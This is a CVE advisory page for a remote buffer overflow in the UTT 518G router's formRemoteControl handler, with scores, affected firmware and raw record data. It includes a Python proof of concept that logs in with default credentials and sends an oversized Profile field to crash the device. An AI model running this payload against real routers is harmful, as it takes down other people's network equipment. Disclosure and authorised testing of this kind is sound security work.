Security Vulnerability Report
CVE-2025-11651 CVSS 8.8 HIGH

CVE-2025-11651

Published: 2025-10-13 00:15:34
Last Modified: 2026-01-08 18:00:51

Description

A vulnerability has been found in UTT 进取 518G up to V3v3.2.7-210919-161313. This vulnerability affects the function sub_4247AC of the file /goform/formRemoteControl. The manipulation of the argument Profile leads to buffer overflow. The attack can be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details (v3.1; the raw record below also carries a v4.0 base score of 7.4 and a v2.0 base score of 9.0)

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:518g_firmware:*:*:*:*:*:*:*:* - VULNERABLE
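cpe:2.3:h:utt:518g:3.0:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry; the raw record joins it with the firmware entry above by AND, so it names the device the vulnerable firmware runs on rather than marking the device as safe)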
UTT 进取 518G ≤ V3v3.2.7-210919-161313

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
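# CVE-2025-11651 PoC - UTT 518G Router Buffer Overflow
# Vulnerability: Buffer overflow in sub_4247AC via Profile parameter
# Endpoint: /goform/formRemoteControl
#
# NOTE(review): the login path (/goform/login) and the form field names used
# below are the ones given in this listing; they are not confirmed against
# real firmware here. If the device authenticates differently, the check
# below proves nothing either way.
#
# Operational notes:
# - On affected firmware the oversized request is expected to take down the
#   management web service, so the device may need a restart afterwards.
# - For monitoring: POSTs to /goform/formRemoteControl carrying an unusually
#   long Profile field are the pattern to look for in web or proxy logs.
# - The advisory reports no vendor response, so limiting who can reach the
#   management interface is the control available in the meantime.
import sys

import requests

TARGET = "http://192.168.1.1"  # Default router IP, modify as needed
AUTH_USER = "admin"
AUTH_PASS = "admin"  # Default credentials or obtained low-privilege credentials


def exploit(target, username, password):
    """Send one oversized ``Profile`` value to formRemoteControl and report the outcome.

    The function logs in first and only continues when that request succeeds.
    The login therefore doubles as a reachability baseline: a timeout or
    dropped connection on the second request is only meaningful because the
    device answered a moment earlier.

    Args:
        target: Base URL of the device, e.g. ``http://192.168.1.1``.
        username: Account name for the management interface.
        password: Password for that account.

    Returns:
        None. The outcome is printed.
    """
    timeout = 10  # seconds; applied to both requests so neither can hang
    base_url = target.rstrip("/")  # avoid "//goform/..." when target ends in "/"
    session = requests.Session()

    # Step 1: Authenticate to obtain low-privilege session.
    # A host that is down, or credentials that are rejected, must not be
    # reported as a crash later on, so stop here in either case.
    login_url = f"{base_url}/goform/login"
    login_data = {"username": username, "password": password}
    try:
        login_response = session.post(login_url, data=login_data, timeout=timeout)
    except requests.exceptions.RequestException as e:
        print(f"[-] Login request failed, target not reachable: {e}")
        return
    # Only catches servers that signal failure with an HTTP error status; a
    # device that answers 200 with an error page is not detected here.
    if login_response.status_code >= 400:
        print(f"[-] Login rejected (HTTP {login_response.status_code}), not testing")
        return

    # Step 2: Send the oversized Profile parameter.
    vuln_url = f"{base_url}/goform/formRemoteControl"
    payload = "A" * 4096  # length as given in the original listing
    overflow_data = {"Profile": payload}

    print(f"[*] Sending exploit to {vuln_url}")
    try:
        response = session.post(vuln_url, data=overflow_data, timeout=timeout)
    except requests.exceptions.Timeout:
        print("[+] Target appears vulnerable (timeout/crash detected)")
    except requests.exceptions.ConnectionError:
        print("[+] Target appears vulnerable (connection refused - crash)")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    else:
        print(f"[*] Response status: {response.status_code}")
        # The original also matched the word "error" anywhere in the body,
        # which flags ordinary error and login pages as a crash; only the
        # status code is used now.
        if response.status_code == 500:
            print("[+] Target appears vulnerable (crash detected)")
        else:
            print("[*] No crash observed; result inconclusive")


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET
    exploit(target, AUTH_USER, AUTH_PASS)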

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11651", "sourceIdentifier": "[email protected]", "published": "2025-10-13T00:15:33.753", "lastModified": "2026-01-08T18:00:50.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in UTT 进取 518G up to V3v3.2.7-210919-161313. This vulnerability affects the function sub_4247AC of the file /goform/formRemoteControl. The manipulation of the argument Profile leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:518g_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.7-210919-161313", "matchCriteriaId": "9D83D3FD-34F4-4FBE-A83A-99AA21B91450"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:518g:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BADC9D6-20DE-466B-AEC1-278B8CC49BEC"}]}]}], "references": [{"url": 
"https://github.com/cymiao1978/cve/blob/main/13.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/13.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328068", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328068", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664925", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}